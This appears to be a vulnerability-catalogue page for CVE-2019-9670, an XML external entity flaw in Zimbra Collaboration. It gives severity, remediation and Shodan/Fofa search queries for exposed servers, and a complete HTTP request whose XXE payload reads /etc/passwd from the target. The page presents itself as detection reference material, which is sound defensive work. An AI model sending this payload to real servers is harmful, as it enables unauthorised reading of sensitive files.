🔙 목록으로 돌아가기

CVE-2019-9670: Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection

TitleSynacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection
Authorree4pwn
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, leading to unauthorized access to sensitive information.
RemediationUpgrade to the latest version of Synacor Zimbra Collaboration (8.7.11p10 or higher) to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.9443
CVE IDCVE-2019-9670
CWE IDCWE-611
Shodan Queryhttp.title:"zimbra collaboration suite"http.title:"zimbra web client sign in"
Fofa Querytitle="zimbra web client sign in"title="zimbra collaboration suite"
Tags cve cve2019 zimbra xxe kev edb packetstorm synacor vkev vuln

🔍 Vulnerability Description

Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.

🌐 HTTP Request

POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
Content-Length: 322
Content-Type: application/xml
Accept-Encoding: gzip

<!DOCTYPE xxe [

<!ELEMENT name ANY >

<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">

<Request>

<EMailAddress>aaaaa</EMailAddress>

<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>

</Request>

</Autodiscover>

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-9670.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-9670.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A